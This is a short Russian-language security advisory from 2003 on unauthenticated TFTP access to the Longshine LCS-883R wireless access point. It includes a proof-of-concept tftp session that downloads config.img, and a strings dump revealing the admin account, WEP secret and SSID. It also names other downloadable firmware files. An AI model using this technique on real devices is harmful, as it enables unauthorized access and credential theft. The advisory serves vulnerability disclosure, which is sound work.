Security Lab

Неавторизованный доступ через TFTP интерфейс к Longshine WLAN Access-Point

Дата публикации:10.01.2003
Дата изменения:17.10.2006
Всего просмотров:957
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Обнаруженная уязвимость в Longshine WLAN Access-Point LCS-883R позволяет атакующему загрузить конфигурацию устройства через tftp, не зная WEP Secret. Также атакующий может получить неавторизованный доступ к паролю администратора RADIUS сервера. Это "нападение" работает через WLAN (!!!) и Ethernet. Пример :
tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit

[~]/-\>strings config.img 
DNXLABAP01 <- name of the AP
root       <- name of the superuser
XXXXXX123  <- password from superuser
DNXLABLAN  <- ssid
secu9      <- secret for WEP
7890abcdef <-
Также можно загрузить следующие файлы - config.img, wbtune.dat, mac.dat, rom.img, normal.img Уязвимость обнаружена в Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps и ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
Ссылки: Longshine WLAN Access-Point LCS-883R VU#310201